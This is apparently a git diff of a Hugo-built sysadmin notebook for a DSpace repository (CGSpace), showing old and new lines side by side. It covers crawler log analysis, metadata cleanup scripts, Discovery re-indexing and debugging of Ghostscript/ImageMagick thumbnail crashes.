<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1083 2a03:2880:11ff:2::face:b00c
1105 2a03:2880:11ff:d::face:b00c
1111 2a03:2880:11ff:f::face:b00c
@ -246,15 +246,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
</code></pre><ul>
<li><code>78.46.89.18</code> is back&hellip; and it is still actually re-using its Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04
8765
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
1
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command and point out that the bot was actually re-using its Tomcat sessions properly</em></li>
<li>Also, now we have a ton of Facebook crawlers:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
905 2a03:2880:11ff:b::face:b00c
955 2a03:2880:11ff:5::face:b00c
965 2a03:2880:11ff:e::face:b00c
@ -275,18 +275,18 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
</code></pre><ul>
<li>They are really making shit tons of requests:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
37721
</code></pre><ul>
<li><em>Updated on 2018-12-04 to correct the grep command to accurately show the number of requests</em></li>
<li>Their user agent is:</li>
</ul>
<pre><code>facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
<pre tabindex="0"><code>facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
</code></pre><ul>
<li>I will add it to the Tomcat Crawler Session Manager valve</li>
<li>Later in the evening&hellip; ok, this Facebook bot is getting super annoying:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1871 2a03:2880:11ff:3::face:b00c
1885 2a03:2880:11ff:b::face:b00c
1941 2a03:2880:11ff:8::face:b00c
@ -307,15 +307,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
</code></pre><ul>
<li>Now at least the Tomcat Crawler Session Manager Valve seems to be forcing it to re-use some Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04
37721
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-04 | sort | uniq | wc -l
15206
</code></pre><ul>
<li>I think we still need to limit more of the dynamic pages, like the &ldquo;most popular&rdquo; country, item, and author pages</li>
<li>It seems these are popular too, and there is no fucking way Facebook needs that information, yet they are requesting thousands of them!</li>
</ul>
<pre><code># grep 'face:b00c' /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c 'most-popular/'
<pre tabindex="0"><code># grep &#39;face:b00c&#39; /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c &#39;most-popular/&#39;
7033
</code></pre><ul>
<li>I added the &ldquo;most-popular&rdquo; pages to the list that return <code>X-Robots-Tag: none</code> to try to inform bots not to index or follow those pages</li>
@ -325,20 +325,20 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<ul>
<li>I wrote a small Python script <a href="https://gist.github.com/alanorth/4ff81d5f65613814a66cb6f84fdf1fc5">add-dc-rights.py</a> to add usage rights (<code>dc.rights</code>) to CGSpace items based on the CSV Hector gave me from MARLO:</li>
</ul>
<pre><code>$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The file <code>marlo.csv</code> was cleaned up and formatted in Open Refine</li>
<li>165 of the items in their 2017 data are from CGSpace!</li>
<li>I will add the data to CGSpace this week (done!)</li>
<li>Jesus, is Facebook <em>trying</em> to be annoying? At least the Tomcat Crawler Session Manager Valve is working to force the bot to re-use its Tomcat sessions:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Nov/2018&quot; | grep -c &quot;2a03:2880:11ff:&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep -c &#34;2a03:2880:11ff:&#34;
29889
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05
# grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05
29763
# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05 | sort | uniq | wc -l
# grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff&#39; dspace.log.2018-11-05 | sort | uniq | wc -l
1057
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Nov/2018&quot; | grep &quot;2a03:2880:11ff:&quot; | grep -c -E &quot;(handle|bitstream)&quot;
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Nov/2018&#34; | grep &#34;2a03:2880:11ff:&#34; | grep -c -E &#34;(handle|bitstream)&#34;
29896
</code></pre><ul>
<li>29,000 requests from Facebook and none of the requests are to the dynamic pages I rate limited yesterday!</li>
@ -350,7 +350,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<li>While I was updating the <a href="https://gist.github.com/alanorth/ddd7f555f0e487fe0e9d3eb4ff26ce50">rest-find-collections.py</a> script I noticed it was using <code>expand=all</code> to get the collection and community IDs</li>
<li>I realized I actually only need <code>expand=collections,subCommunities</code>, and I wanted to see how much overhead the extra expands created so I did three runs of each:</li>
</ul>
<pre><code>$ time ./rest-find-collections.py 10568/27629 --rest-url https://dspacetest.cgiar.org/rest
<pre tabindex="0"><code>$ time ./rest-find-collections.py 10568/27629 --rest-url https://dspacetest.cgiar.org/rest
</code></pre><ul>
<li>Average time with all expands was 14.3 seconds, and 12.8 seconds with <code>collections,subCommunities</code>, so <strong>1.5 seconds difference</strong>!</li>
</ul>
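<ul>
<li>For reference, a sketch of the kind of REST request the script makes with the reduced expands (reusing the same community handle as above; this is only an illustration, not the script&rsquo;s exact call):</li>
</ul>
<pre tabindex="0"><code>$ http &#39;https://dspacetest.cgiar.org/rest/handle/10568/27629?expand=collections,subCommunities&#39;
</code></pre>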
@ -403,22 +403,22 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
<ul>
<li>Testing corrections and deletions for AGROVOC (<code>dc.subject</code>) that Sisay and Peter were working on earlier this month:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p 'fuu' -d
$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p &#39;fuu&#39; -d
</code></pre><ul>
<li>Then I ran them on both CGSpace and DSpace Test, and started a full Discovery re-index on CGSpace:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Generate a new list of the top 1500 AGROVOC subjects on CGSpace to send to Peter and Sisay:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-11-19-top-1500-subject.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 57 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2018-11-19-top-1500-subject.csv WITH CSV HEADER;
</code></pre><h2 id="2018-11-20">2018-11-20</h2>
<ul>
<li>The Discovery re-indexing on CGSpace never finished yesterday&hellip; the command died after six minutes</li>
<li>The <code>dspace.log.2018-11-19</code> shows this at the time:</li>
</ul>
<pre><code>2018-11-19 15:23:04,221 ERROR com.atmire.dspace.discovery.AtmireSolrService @ DSpace kernel cannot be null
<pre tabindex="0"><code>2018-11-19 15:23:04,221 ERROR com.atmire.dspace.discovery.AtmireSolrService @ DSpace kernel cannot be null
java.lang.IllegalStateException: DSpace kernel cannot be null
at org.dspace.utils.DSpace.getServiceManager(DSpace.java:63)
at org.dspace.utils.DSpace.getSingletonService(DSpace.java:87)
@ -458,7 +458,7 @@ java.lang.IllegalStateException: DSpace kernel cannot be null
<li>fix column with invalid spaces in metadata field name (cg. subject. wle)</li>
<li>remove columns with no metadata (place, target audience, isbn, uri, publisher, ispartofseries, subject)</li>
<li>remove some weird Unicode characters (0xfffd) from abstracts, citations, and titles using Open Refine: <code>value.replace('�','')</code></li>
<li>I notice a few items using DOIs pointing at ICARDA&rsquo;s DSpace like: <a href="https://doi.org/20.500.11766/8178,">https://doi.org/20.500.11766/8178,</a> which then points at the &ldquo;real&rdquo; DOI on the publisher&rsquo;s site&hellip; these should be using the real DOI instead of ICARDA&rsquo;s &ldquo;fake&rdquo; Handle DOI</li>
<li>I notice a few items using DOIs pointing at ICARDA&rsquo;s DSpace like: <a href="https://doi.org/20.500.11766/8178">https://doi.org/20.500.11766/8178</a>, which then points at the &ldquo;real&rdquo; DOI on the publisher&rsquo;s site&hellip; these should be using the real DOI instead of ICARDA&rsquo;s &ldquo;fake&rdquo; Handle DOI</li>
<li>Some items missing DOIs, but they clearly have them if you look at the publisher&rsquo;s site</li>
</ul>
</li>
@ -479,13 +479,13 @@ java.lang.IllegalStateException: DSpace kernel cannot be null
<li><a href="https://cgspace.cgiar.org/handle/10568/97709">This WLE item</a> is issued on 2018-10 and accessioned on 2018-10-22 but does not show up in the <a href="https://cgspace.cgiar.org/handle/10568/41888">WLE R4D Learning Series</a> collection on CGSpace for some reason, and therefore does not show up on the WLE publication website</li>
<li>I tried to remove that collection from Discovery and do a simple re-index:</li>
</ul>
<pre><code>$ dspace index-discovery -r 10568/41888
<pre tabindex="0"><code>$ dspace index-discovery -r 10568/41888
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
</code></pre><ul>
<li>&hellip; but the item still doesn&rsquo;t appear in the collection</li>
<li>Now I will try a full Discovery re-index:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Ah, Marianne had set the item as private when she uploaded it, so it was still private</li>
<li>I made it public and now it shows up in the collection list</li>
@ -497,7 +497,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>Linode alerted me that the outbound traffic rate on CGSpace (linode19) was very high</li>
<li>The top users this morning are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;27/Nov/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Nov/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
229 46.101.86.248
261 66.249.64.61
447 66.249.64.59
@ -512,7 +512,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
<li>We know 70.32.83.92 is the CCAFS harvester on MediaTemple, but 205.186.128.185 is new and appears to be another CCAFS harvester</li>
<li>I think we might want to prune some old accounts from CGSpace; perhaps users who haven&rsquo;t logged in in the last two years would be a conservative bunch:</li>
</ul>
<pre><code>$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 | wc -l
<pre tabindex="0"><code>$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 | wc -l
409
$ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 -d
</code></pre><ul>
@ -553,15 +553,15 @@ $ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 -d
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -36,7 +36,7 @@ Then I ran all system updates and restarted the server
I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -117,7 +117,7 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
<p class="blog-post-meta">
<time datetime="2018-12-02T02:09:30+02:00">Sun Dec 02, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -135,8 +135,8 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
<ul>
<li>The error when I try to manually run the media filter for one item from the command line:</li>
</ul>
<pre><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&quot; &quot;-f/tmp/magick-129895Bmp44lvUfxo&quot; &quot;-f/tmp/magick-12989C0QFG51fktLF&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&quot; &quot;-f/tmp/magick-129895Bmp44lvUfxo&quot; &quot;-f/tmp/magick-12989C0QFG51fktLF&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d&#34; &#34;-f/tmp/magick-129895Bmp44lvUfxo&#34; &#34;-f/tmp/magick-12989C0QFG51fktLF&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.Info.getBaseInfo(Info.java:360)
at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
@ -157,14 +157,14 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>I think we need to wait for a fix from Ubuntu</li>
<li>For what it&rsquo;s worth, I get the same error on my local Arch Linux environment with Ghostscript 9.26:</li>
</ul>
<pre><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn't match
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn&#39;t match
zsh: segmentation fault (core dumped) gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
</code></pre><ul>
<li>When I replace the <code>pngalpha</code> device with <code>png16m</code> as suggested in the StackOverflow comments it works:</li>
</ul>
<pre><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn't match
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn&#39;t match
</code></pre><ul>
<li>Start proofing the latest round of 226 IITA archive records that Bosede sent last week and Sisay uploaded to DSpace Test this weekend (<a href="https://dspacetest.cgiar.org/handle/10568/108298">IITA_Dec_1_1997 aka Daniel1807</a>)
<ul>
@ -182,7 +182,7 @@ DEBUG: FC_WEIGHT didn't match
</li>
<li>Expand my &ldquo;encoding error&rdquo; detection GREL to include <code>~</code> as I saw a lot of that in some copy pasted French text recently:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
isNotNull(value.match(/.*\u200A.*/)),
@ -196,48 +196,48 @@ DEBUG: FC_WEIGHT didn't match
<li>I can successfully generate a thumbnail for another recent item (<a href="https://hdl.handle.net/10568/98394">10568/98394</a>), but not for <a href="https://hdl.handle.net/10568/98390">10568/98930</a></li>
<li>Even manually on my Arch Linux desktop with ghostscript 9.26-1 and the <code>pngalpha</code> device, I can generate a thumbnail for the first one (10568/98394):</li>
</ul>
<pre><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf
</code></pre><ul>
<li>So it seems to be something about the PDFs themselves, perhaps related to alpha support?</li>
<li>The first item (10568/98394) has the following information:</li>
</ul>
<pre><code>$ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
<pre tabindex="0"><code>$ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf[0]=&gt;Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf PDF 595x841 595x841+0+0 16-bit sRGB 107443B 0.000u 0:00.000
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
</code></pre><ul>
<li>And wow, I can&rsquo;t even run ImageMagick&rsquo;s <code>identify</code> on the first page of the second item (10568/98930):</li>
</ul>
<pre><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
<pre tabindex="0"><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
</code></pre><ul>
<li>But with GraphicsMagick&rsquo;s <code>identify</code> it works:</li>
</ul>
<pre><code>$ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
DEBUG: FC_WEIGHT didn't match
<pre tabindex="0"><code>$ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
DEBUG: FC_WEIGHT didn&#39;t match
Food safety Kenya fruits.pdf PDF 612x792+0+0 DirectClass 8-bit 1.4Mi 0.000u 0m:0.000002s
</code></pre><ul>
<li>Interesting that ImageMagick&rsquo;s <code>identify</code> <em>does</em> work if you do not specify a page, perhaps as <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699815">alluded to in the recent Ghostscript bug report</a>:</li>
</ul>
<pre><code>$ identify Food\ safety\ Kenya\ fruits.pdf
<pre tabindex="0"><code>$ identify Food\ safety\ Kenya\ fruits.pdf
Food safety Kenya fruits.pdf[0] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[1] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[2] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[3] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[4] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
</code></pre><ul>
<li>As I expected, ImageMagick cannot generate a thumbnail, but GraphicsMagick can (though it looks like crap):</li>
</ul>
<pre><code>$ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
<pre tabindex="0"><code>$ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
zsh: abort (core dumped) convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten
$ gm convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
</code></pre><ul>
<li>I inspected the troublesome PDF using <a href="http://jhove.openpreservation.org/">jhove</a> and noticed that it is using <code>ISO PDF/A-1, Level B</code> and the other one doesn&rsquo;t list a profile, though I don&rsquo;t think this is relevant</li>
<li>I found another item that fails when generating a thumbnail (<a href="https://hdl.handle.net/10568/98391">10568/98391</a>), DSpace complains:</li>
</ul>
